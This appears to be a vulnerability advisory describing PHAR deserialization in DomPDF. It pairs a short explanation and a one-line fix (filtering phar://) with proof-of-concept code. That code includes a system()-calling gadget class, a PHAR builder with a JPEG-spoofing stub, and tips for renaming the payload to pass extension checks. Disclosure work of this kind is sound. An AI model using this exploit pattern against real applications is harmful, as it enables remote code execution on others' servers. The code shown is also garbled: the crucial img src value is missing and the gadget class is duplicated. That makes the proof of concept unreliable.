DomPDF is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_get_contents() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and
instantiate arbitrary PHP objects. This can lead to remote code execution especially when DOMPdf is used with frameworks with documented POP chains like Laravel / vulnerable developer code.
// vuln.php
<?php
// Include autoloader
require_once 'dompdf/autoload.inc.php';
// Include vulnerable objects
include("phar-poc.php");
// Reference the Dompdf namespace
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);
// Load HTML content
$dompdf->loadHtml('<img src>');
// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape');
// Render the HTML as PDF
$dompdf->render();
// Output the generated PDF to Browser
//$dompdf->stream();
?>
// phar-poc.php
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
php --define phar.readonly=0 create_phar.php
and execute vuln.php with php vuln.php, you should see whoami being executed
Note that after generating the PHAR exploit code, an attacker can rename it to whatever extension or filename they want, it is possible to rename it test.phar to test.png to bypass any file extension check by the developer and specify phar://test.png in the src attribute.
This vulnerability is capable of remote code execution if DOMPdf is used with frameworks or developer code with vulnerable POP chains.
Filter the phar:// protocol.